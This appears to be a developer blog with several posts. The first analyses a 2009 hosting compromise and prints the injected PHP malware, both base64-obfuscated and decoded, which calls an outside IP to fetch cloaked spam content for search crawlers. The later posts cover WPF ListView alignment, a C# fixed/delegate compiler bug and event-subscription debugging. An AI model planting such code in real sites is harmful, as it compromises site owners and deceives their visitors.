My media temple hosted web site got hacked

Last night my web sites hosted at media temple got hacked. I got an email from them saying that they detected "suspicious activity". Good that they have something in place that is able to detect that, but this time it was not really necessary since the web sites were malfunctioning so I found out about the issue myself pretty quickly...

Turned out that all of my index.php and index.html files were changed. Also a .htaccess files was added next to those files (or replaced if there was one before).
There was a piece of code added to the files:

<!--ddgbsre_erd_sdd--><?php eval(base64_decode("aWYoc3RyaXBvcygkX1NF
UlZFUlsnSFRUUF9VU0VSX0FHRU5UJ10sICdnb29nbGUnKSBvciBzdHJpcG9zKCRfU0VS
VkVSWydIVFRQX1VTRVJfQUdFTlQnXSwgJ3lhaG9vJykgb3Igc3RyaXBvcygkX1NFUlZF
UlsnSFRUUF9VU0VSX0FHRU5UJ10sICdtc24nKSBvciBzdHJpcG9zKCRfU0VSVkVSWydI
VFRQX1VTRVJfQUdFTlQnXSwgJ2xpdmUnKSkNCnsNCiAgJHIgPSAnJzsNCiAgaWYoJGY9
QGZzb2Nrb3BlbignOTEuMjA3LjQuMTgnLDgwLCRlLCRlciwxMCkgYW5kIEBmcHV0cygk
ZiwgIkdFVCAvbGlua2l0L2luLnBocD9kb21haW49IiAuIHVybGVuY29kZSgkX1NFUlZF
UlsiU0VSVkVSX05BTUUiXSkgLiAiJnVzZXJhZ2VudD0iIC4gdXJsZW5jb2RlKCRfU0VS
VkVSWydIVFRQX1VTRVJfQUdFTlQnXSkgLiAiIEhUVFAvMS4wXHJcbkhvc3Q6IDkxLjIw
Ny40LjE4XHJcblxyXG4iKSkNCiAgd2hpbGUoICRsID0gZnJlYWQoJGYsIDEwMjQpKSAk
ciAuPSAkbDsNCiAgQGZjbG9zZSgkZik7DQogICRwPXN0cnBvcygkciwiXHJcblxyXG4i
KTsgZWNobyBzdWJzdHIoJHIsJHArNCk7DQp9"));

When you base64-decode this you get (indentation by me):

if(stripos($_SERVER['HTTP_USER_AGENT'], 'google') or 
   stripos($_SERVER['HTTP_USER_AGENT'], 'yahoo') or 
   stripos($_SERVER['HTTP_USER_AGENT'], 'msn') or 
   stripos($_SERVER['HTTP_USER_AGENT'], 'live'))
{
  $r = '';
  if($f=@fsockopen('91.207.4.18',80,$e,$er,10) and 
    @fputs($f, "GET /linkit/in.php?domain=" . urlencode($_SERVER["SERVER_NAME"]) . 
        "&useragent=" . urlencode($_SERVER['HTTP_USER_AGENT']) .
        " HTTP/1.0\r\nHost: 91.207.4.18\r\n\r\n"))
  while( $l = fread($f, 1024)) $r .= $l;
  @fclose($f);
  $p=strpos($r,"\r\n\r\n"); echo substr($r,$p+4);
}

I do not know much about PHP, but it seems that requests from search engine crawlers get special treatment and additional content is added to the page which is retrieved from the IP address 91.207.4.18. I guess the purpose is to add links to other sites to increase their page rank.
At least for my php sites this did not work however. The code addition invalided the files, presenting an error to the user for all requests.


Not sure how the hack was done. The media temple email suggested to change the ftp/ssh passwords. But I doubt that these passwords were compromised, because it seems that I am not the only one at media temple having the problem:
http://blog.tinyenormous.com/2009/11/17/site-hacked-media-temples-reaction/
Let's wait what media temple has to say about this.

Update 27-Nov-2009: Media temple published some information on how the hack was done. Seems that the attacker got hold of passwords which have been stored as clear text. Read more about this in the media temple FAQ for this issue. There is also a how-to for fixing hacked accounts.

WPF: How to set HorizontalAlignment in ListView/GridView

I spent quite some time figuring out how to set the HorizontalAlignment property for a cell in a WPF ListView/GridView. I wanted to set it to "Stretch" so that their content can nicely fill the whole cell, even when the columns are resized. It is not hard to do, it is just a few lines of XAML, but you have to know how.

<ListView>

    <ListView.ItemContainerStyle>
        <Style TargetType="ListViewItem">
            <Setter Property="HorizontalContentAlignment" Value="Stretch" />
        </Style>
    </ListView.ItemContainerStyle>
    ...
</ListView>

Same is probably also true for VerticalAlignment, but I haven't tried it.

C#'s fixed statement doesn't work with delegates!?

I recently ran into an issue with using the C# fixed statement in conjunction with delegates. Let's look at a small example:

unsafe byte testA()
{
    var array = new byte[1];
    fixed (byte* p = array)
    {
        *p = 22;
    }
    return array[0];
}

This (rather ridiculous) method should return 22. In fact, it does.
But look at a small variation:

unsafe byte testB()
{
    var array = new byte[1];
    fixed (byte* p = array)
    {
        Action action = delegate { *p = 22; };
        action();
    }
    return array[0];
}

This should do the same thing, the difference is that the fixed pointer p is accessed inside a delegate. The action is executed synchronously inside the fixed scope, so everything should be be fine.

But it turns out that it is NOT!
When you compile it (I'm using VS2008 SP1 and .NET 3.5 SP1) and look at the compiled version of the method, it looks like this (disassembled using Reflector):

private unsafe byte testB()
{
    byte[] CS$0$0001;
    byte[] array = new byte[1];
    byte* p;
    if (((CS$0$0001 = array) == null) || (CS$0$0001.Length == 0))
    {
        p = null;
    }
    else
    {
        p = CS$0$0001;
    }
    Action action = delegate {
        p[0] = 0x16;
    };
    action();
    p = null;
    return array[0];
}

I don't know what this CS$0$0001 is about, but that's secondary.
The importing thing is: there's no fixed statement!!!
Without the fixed statement the array can be moved in memory any time, and therefore the unsafe code can fail!
It looks like that the C# compiler think it can optimize away the fixed statement. For some reason it doesn't take the usage of p in the delegate into account. Of course, one could execute the delegate outside the scope of the fixed statement. The compiler doesn't have a chance to prolong the lifetime of the pinned pointer until then. But this is not the case here.

This is not a theoretical problem. We ran into this in a real-world application.
Here's a small test program that illustrates that:

static unsafe byte test()
{
    var array = new byte[1];

    fixed (byte* p = array)
    {
        Action action = delegate { *p = 22; };
        Thread.Sleep(10);
        action();
    }
    return array[0];
}

static void Main()
{
    for (int i = 0; i < 10000; i++)
    {
        if (22 != test())
        {
            Console.WriteLine("Run #{0} failed!", i);
        }
    }
}

This code runs our example code 10,000 times. I added a Sleep() call in my test method to make the problem more likely. On my machine the error occurs usually after around 3500 runs.

Michael Stanton, who helped my track down this issue, has more in-depth info about it.

If you looking for a fix, there is an easy work-around (if you really need both unsafe code and the delegate). You can pin your memory manually without using the fixed statement. Then you have full control over its life-time.
For our example this would be:

unsafe byte testFixed()
{
    var array = new byte[1];

    GCHandle handle = GCHandle.Alloc(array, GCHandleType.Pinned);
    byte* p = (byte*)handle.AddrOfPinnedObject();
    try
    {
        Action action = delegate { *p = 22; };
        action();
    }
    finally
    {
        handle.Free();
    }
    return array[0];
}

Debugging event subscriptions in C#/.NET

Recently I had to debug a problem around events. I wanted to find out which objects are subscribing to a certain event and when. As there is no code in the class that handles the event subscription, you cannot set a breakpoint there. Too bad...

But there's a simple way out of this. Let's assume you have a class like this:

class Test : INotifyPropertyChanged
{

    public event PropertyChangedEventHandler PropertyChanged = delegate { };

    void FirePropertyChanged(string property)
    {
        PropertyChanged(this, new PropertyChangedEventArgs(property));
    }
}

You can add a "custom event implementation" that forwards all event subscriptions and un-subscriptions to a private event, similar to a property that uses a private field to store its value:

class Test : INotifyPropertyChanged
{

    private event PropertyChangedEventHandler propertyChangedImpl = delegate { };
    public event PropertyChangedEventHandler PropertyChanged
    {
        add { this.propertyChangedImpl += value; }
        remove { this.propertyChangedImpl -= value; }
    }

    void FirePropertyChanged(string property)
    {
        this.propertyChangedImpl(this, new PropertyChangedEventArgs(property));
    }
}

The you can simply set the breakpoint to the add method and see exactly where and when these event registrations happen.